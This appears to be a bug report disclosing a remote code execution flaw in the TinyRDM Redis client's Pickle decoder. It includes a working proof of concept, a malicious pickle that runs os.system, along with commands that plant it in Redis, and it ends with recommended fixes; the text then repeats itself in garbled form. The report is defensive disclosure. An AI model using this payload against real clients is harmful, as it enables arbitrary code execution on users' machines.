Tiny RDM Version
v1.2.5
OS Version
Mac/Windows/Linux
Redis Version
latest
Describe the bug
TinyRDM ships with a builtin “Pickle” decoder that invokes pickle.loads on the TinyRDM host whenever a user explicitly selects Pickle decoding in the value viewer. Because Python pickle is inherently unsafe for untrusted input, an attacker controlling Redis data can achieve arbitrary code execution on the user’s machine simply by getting the user to inspect the malicious key and choose Pickle decoding in TinyRDM.
-
Affected components
pickle_convert.go creates pickle_decoder.py and runs pickle.loads(decoded) without isolation. browser_service.go calls convutil.ConvertTo for key values when the user requests Pickle decoding.
-
Impact
Remote code execution with the privileges of the TinyRDM desktop user. Any Redis server that a user connects to can deliver a pickle payload; viewing the key triggers arbitrary command execution on the client machine.
-
Proof of Concept
- Generate malicious pickle payload (touches
/tmp/hacked-by-zznq on the TinyRDM host):
# poc.py
import pickle
import os
class RCE:
def __reduce__(self):
return (os.system, ("touch /tmp/hacked-by-zznq",))
with open("payload.pkl", "wb") as f:
f.write(pickle.dumps(RCE()))python3 poc.py # writes payload.pkl
- Start Redis (example):
docker run --rm -p 6379:6379 --name tinyrdm-redis redis:latest
docker cp payload.pkl tinyrdm-redis:/tmp/payload.pkl
docker exec tinyrdm-redis sh -c 'redis-cli -x LPUSH evil_poc:list </tmp/payload.pkl'
- In TinyRDM, connect to the Redis instance and open key
evil_poc. Choose decode values with "Pickle".
- As soon as the value viewer loads, PickleConvert::Decode executes on the host and creates
/tmp/hacked-by-zznq, proving code execution.
-
Technical Details
- When the user selects
decode=Pickle, convutil.ConvertTo goes straight to pickleConv.Decode, spawning a local Python interpreter and running pickle.loads.
- List/Hash/Set/.. viewers call
ConvertTo when the user changes the Decode dropdown, so payloads embedded in non-string key types can also trigger execution.
-
Recommended Fixes
- Require explicit opt-in with a prominent warning, or disable it entirely.
- If pickle support must remain, run the helper in a sandbox (container, seccomp) and deserialize with a restricted, schema-checked parser rather than
pickle.loads.
Tiny RDM Version
v1.2.5
OS Version
Mac/Windows/Linux
Redis Version
latest
Describe the bug
TinyRDM ships with a builtin “Pickle” decoder that invokes
pickle.loadson the TinyRDM host whenever a user explicitly selects Pickle decoding in the value viewer. Because Python pickle is inherently unsafe for untrusted input, an attacker controlling Redis data can achieve arbitrary code execution on the user’s machine simply by getting the user to inspect the malicious key and choose Pickle decoding in TinyRDM.Affected components
pickle_convert.go creates
pickle_decoder.pyand runspickle.loads(decoded)without isolation. browser_service.go callsconvutil.ConvertTofor key values when the user requests Pickle decoding.Impact
Remote code execution with the privileges of the TinyRDM desktop user. Any Redis server that a user connects to can deliver a pickle payload; viewing the key triggers arbitrary command execution on the client machine.
Proof of Concept
/tmp/hacked-by-zznqon the TinyRDM host):python3 poc.py # writes payload.pklevil_poc. Choose decode values with "Pickle"./tmp/hacked-by-zznq, proving code execution.Technical Details
decode=Pickle,convutil.ConvertTogoes straight topickleConv.Decode, spawning a local Python interpreter and runningpickle.loads.ConvertTowhen the user changes the Decode dropdown, so payloads embedded in non-string key types can also trigger execution.Recommended Fixes
pickle.loads.